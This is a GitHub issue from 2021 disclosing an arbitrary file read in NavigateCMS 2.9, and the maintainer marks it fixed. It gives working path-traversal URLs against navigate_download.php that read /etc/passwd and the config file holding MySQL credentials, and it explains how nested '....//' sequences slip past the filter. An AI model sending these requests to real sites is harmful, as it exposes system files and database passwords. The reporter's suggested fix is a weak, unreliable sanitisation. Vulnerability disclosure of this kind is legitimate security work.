Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

arbitrary file read vulnerability in NavigateCMS 2.9 #28

Closed
bkfish opened this issue Nov 25, 2021 · 1 comment
Closed

arbitrary file read vulnerability in NavigateCMS 2.9 #28

bkfish opened this issue Nov 25, 2021 · 1 comment

Comments

@bkfish
Copy link

bkfish commented Nov 25, 2021

exp

after login ,we can see our sid in cookies
image
for example my sid is 161099c65675803ecc8de95ae08d3e12
then you can get arbitrary file by
/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//....//....//etc/passwd
image
/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//cfg/globals.php you can get some Sensitive information such as mysql user/password

analysis

location:navigate_download.php
image
and in navigate\lib\core\core.php
image
we can rewrite bypass this filter.

suggest

you can use replace('../', "hacker") rather than replace('../', "")

@bkfish bkfish changed the title arbitrary file read vulnerability arbitrary file read vulnerability in NavigateCMS 2.9 Nov 25, 2021
@NavigateCMS
Copy link
Owner

Fixed by fabb471

Thank you very much bkfish!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants